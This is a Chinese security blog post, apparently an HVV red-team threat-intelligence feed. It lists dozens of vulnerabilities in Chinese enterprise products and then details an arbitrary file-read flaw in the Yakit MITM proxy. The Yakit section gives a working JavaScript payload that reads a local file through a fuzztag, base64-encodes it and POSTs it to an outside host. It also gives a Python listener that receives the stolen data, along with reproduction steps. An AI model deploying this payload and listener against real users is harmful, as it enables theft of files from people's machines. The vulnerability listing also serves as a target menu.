2023 HVV 0day / Nday / POC / EXP 威胁情报之YAKIT任意文件读取
漏洞情报列表
每日更新
安**御运维审计与风险控制系统堡垒机任意用户注册
致*oa 任意文件上传
致*oa rce
用*移动管理系统 uploadApk.d
用*时空KSOA PayBill SQL注入漏洞
网* SecSSL 3600安全接入网关系统 任意密码修改漏洞
网* SecGate 3600 防火墙 obj_app_upfile接口存在任意文件上传漏洞
通*oaCVE-2023-4166
通*oa_sql注入
天*网关前台SQL注入
深*服应用交付系统命令执行漏洞
深*服报表
绿* SAS堡垒机 local_user.php 任意用户登录漏洞
绿* SAS堡垒机 Exec 远程命令执行漏洞
蓝*-OA-RCE
金*OA C6-GetSqlData.aspx SQL注入漏洞 POC
汉*SRM tomcat.jsp 登录绕过漏洞
海**视前台上传
广*达oa 后台文件上传漏洞
绿* NF 下一代防火墙 任意文件上传漏洞
HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞
HiKVISION 综合安防管理平台 env 信息泄漏漏洞
禅* 16.5 router.class.php SQL注入漏洞
网* SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
金*OA 未授权
宏*OA文件上传
用*畅捷通 T注入
用*时空 KSOA servletimagefield 文件 sKeyvalue 参数SQL 注入
用*时空 KSOATaskRequestServlet sql注入漏洞
宏* HCM codesettree SQL 注入漏洞
泛* ShowDocsImagesql注入漏洞
3*0 新天*终端安全管理系统信息泄露漏洞
企业微*(私有化版本)敏感信息泄露漏洞
华*动力oa SQL注入
用*文件服务器认证绕过
广联& Linkworks GetIMDictionarySQL 注入漏洞
网* ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞
Panel loadfile 后台文件读取漏洞
金* 微信管理平台 getsysteminfo 未授权访问漏洞
PigCMS action_flashUpload 任意文件上传漏洞
Coremail 邮件系统未授权访问获取管理员账密
Milesight VPN server.js 任意文件读取漏洞
红* oa 注入
nginx配置错误导致的路径穿越风险
用*GRP-U8存在信息泄露
启**辰-4A 统一安全管控平台 getMater 信息泄漏
广*达oa sql注入漏洞
泛*oa代码执行
泛*E-Office9文件上传漏洞
泛* Weaver E-Office9 前台文件包含
泛* E-Cology 某版本 SQL注入漏洞 POC
大*智慧园区综合管理平台 文件上传漏洞
大*智慧园区综合管理平台 searchJson SQL注入漏洞
大*智慧园区任意密码读取攻击
辰*景云终端安全管理系统 login SQL注入漏洞
x捷 xBR 路由器 任意文件上传漏洞
wps
Openfire身份认证绕过漏洞
Nacos-Sync
Eramba任意代码执行漏洞
YAKIT 任意文件读取
简介
yakit是近年新兴的一个BurpSuite平替工具,和burp的区别就在于数据包放过去不用配置ip端口协议这些,但是yakit跑起来感觉卡卡的,远不如burp那么流畅,近期yakit爆出了一个任意文件读取漏洞,此漏洞通过在网页嵌入js代码实现读取yakit使用者设备上的文件 触发版本:引擎版本< Yaklang 1.2.4-sp2 漏洞条件:使用yakit的MITM代理并且启用任意插件
Pyload:
<script>
const xhr = new XMLHttpRequest();
xhr.open("POST", "
<http://yakit.com/filesubmit>
");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send(`file={{base64enc(file(C:\\Windows\\System32\\drivers\\etc\\hosts))}}`);
</script>
监听脚本
#! /bin/python3
import socket
# 监听地址和端口
host = '0.0.0.0'
port = 23800
# 创建socket服务器
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 绑定并监听端口
server.bind((host, port))
server.listen()
# 接收连接并监听请求
print("Listening...")
while True:
# 接收客户端连接请求
client, address = server.accept()
print(f"Connected by {address}")
# 读取客户端请求数据
request = ''
while True:
input_data = client.recv(1024).decode('utf-8')
request += input_data
if len(input_data) < 1024:
break
# 提取请求头部
headers = request.split('\n')
print("Received headers:")
for header in headers:
print(header)
# 关闭客户端连接
client.close()
复现过程
复现开始:创建一个html页面并插入payload
启用MITM代理,不启用插件进行访问:
https://mmbiz.qpic.cn/sz_mmbiz_png/OF9Ieq8TATc71LlcBt5FGOn2ibomGw7wMXX7dh9j86aZ7JA0WMoxwHSDdAwnMVSZLoF09zuiamTpkibBtLto8y8KA/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1
启用MITM代理并启用插件进行访问:
https://mmbiz.qpic.cn/sz_mmbiz_png/OF9Ieq8TATc71LlcBt5FGOn2ibomGw7wM1RvwO5nnYhpX3aKZeCDdziaCEcOSDfbIcu2wNe27x7aTsPgBXo8KTsQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1
原理:
yakit默认不会对经过MITM代理的流量中的fuzztag进行解析,但是经过插件时会被解析,所以这也是利用限制。
说明
资料搜集来源于互联网,仅做技术分享与hvv威胁情报预警,切勿用于违法行为。
每日更新漏洞情报 一键三连加关注 !!!
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...